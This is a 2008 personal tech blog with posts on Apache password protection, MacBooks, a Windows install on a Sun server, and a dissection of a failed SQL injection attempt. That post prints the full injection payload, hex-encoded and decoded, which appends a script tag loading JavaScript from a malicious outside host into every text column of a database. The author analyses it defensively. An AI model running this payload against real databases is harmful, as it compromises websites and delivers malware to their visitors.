Wednesday, August 13, 2008

Simple password protection in Apache 2.x

Just dropping this in here so I can find it again, I could never get .htaccess files to work in windows so this works in the same way

Use htpasswd -cb filename username password to create your hashed password file

put

<directory "some directory tree to protect">
AllowOverride None
Options None
AuthType Basic
AuthUserFile "path to password file
AuthName "message for users"
require valid-user
Order deny, allow
</directory>

Tuesday, August 12, 2008

Tech I Touch #2

Time for another installment of this section! This time it's the turn of my macbooks.

At the minute I am currently using 2 macbooks, one a 1st generation MacBook and the other is the latest version of the MacBook Pro.

Both are admirable performers in their own way, they both fulfill computing needs that I have.

The MacBook Pro was supplied by my employers (cheers for that if anyone is reading!) as my day-to-day office machine, the 15.4" screen makes it a bit more pleasing to use for longer periods. It's a fantastic piece of hardware, up to my usual exceptionally high engineering standards.

My MacBook (Black 2 GHz Core Duo) is my own machine, its a few years old now but is still my number one machine, I use it primarily at home as the smaller screen is a bit less intrusive, if I had to travel a lot, I would definitely have requested another one of these as the smaller size isn't noticeable in use but definitely when packing it or carrying it about.

Both have their individual merits, the backlit keyboard on the MBP but I prefer the feel of the keys on the MB, they remind me of the ZX spectrum I owned once upon a time. I find it more pleasant to type on but I am a very aggressive typist.

I always said to people that "personally I didn't see a use for the MacBook Air", but I think that I may have been taken out of context. I think it is a very capable machine but it just doesn't suit my computing style; that's not to say that I wouldn't want to have one to play about with. I like the compactness but would miss several of the features, a wired ethernet port being the most important. But there is definitely a market for it, as evidenced by the slew of ultraportables that have been released in direct competition for it.

If I had to choose an ultraportable it most likely would be the Air as the price is about right and it can run OS X (legally and without hackery) which is definitely my preferred operating system at the moment. A linux KDE system might overtake it but I'm not particularly taken by KDE 4 right at this present moment, 3.x was fine and I preferred it to Gnome and KDE 4 but I'm strongly tempted to go back to Gnome if 3.x becomes unavailable.

Oh dear, this has turned into a rant of some kind, and I don't want to start a browser/os/window manager war at all.

Wednesday, August 06, 2008

The following is a basic dissection of a failed SQL injection attempt

it starts with the following being passed in the URL against another URL Parameter (this has had line breaks added to prevent the formatting from being screwed up)

'DECLARE @S CHAR(4000)SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F627564756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A6A6D616F627564756F2E333332322E6F72672F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000))EXEC(@S)

this is the string hexadecimal decoded so that humans can read is as SQL speaks hexadecimal natively

DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://jjmaobuduo.3322.org/csrss/w.js"<>/script<>!--'' where '+@C+' not like ''%"></title><script src="http://jjmaobuduo.3322.org/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


The following are the translated xtypes so we can see what type of fields it is trying to insert into

|XTYPE | Field Type|

|------------------|

|99 | ntext |

|35 | text |

|231 | nvarchar |

|167 | varchar |

-------------------|

it then proceeds to iterate through all the tables and rows in each, appending the string
</title><script src="http://jjmaobuduo.3322.org/csrss/w.js"></script><!-- 

except where it has already found it, so the potential is there for multiple attacks but from the script having the opening HTML tags, only the initial successful attack would actually work.

This attack in particular redirects users to a malicious page that will attempt to get them to download a trojan type virus which is most likely a remote exploit that would allow remote control of their machine to be used in a botnet for any number of purchases, or simply a sniffer for "useful" information like credit cards and banking details.
This is probably not as bad from an administrative standpoint as a DROP * query being injected, but it is in my opinion a bit more sinister.

Tuesday, August 05, 2008

Installing Windows 2003 64 bit on Sun X4150

Having received a shiny new Sun x4150 to be used as an exchange server, I came across a few interesting details about it.

1. It comes in lots and lots of boxes and must be assembled.
2. It's nice and easy to work in as its so tidy and well organised.
3. It doesn't come with a CD/DVD Drive by default so pull out your USB drives or just order one from the factory.

As it doesn't have a floppy drive it's a bit problematic installing the drivers for the LSI Logic RAID Card, I had to remaster the windows 2003 64bit CD in order to slipstream the drivers onto it for textmode setup.

Firstly download nLite, its a great tool for doing unattended installations as well as integrating stuff into a new windows install CD

Tell it to rip the windows install from the CD Drive or do it yourself and tell it where the folders are.

On the next screen, pick the drivers button and the bootable ISO option. You can have a play about with the rest but its up to yourself.

Change out your Windows CD for the "SunFire Tools and Drivers CD" that came with your server or download it from sun.com.

On the drivers screen, tell it to import the Multiple Driver select, then pick the cd:/drivers/windows directory (or similar). Then select the drivers that have 64 bit in them, but don't bother with the drivers with RIS in their path.

Hit next and then on the last screen hit Make ISO.

And thats you, burn it out and you are laughing

Apparently there is a tool on the sun disk that does this (or similar) but I didn't have access to a Solaris or Red Hat box to do it.

This worked for me but as always YMMV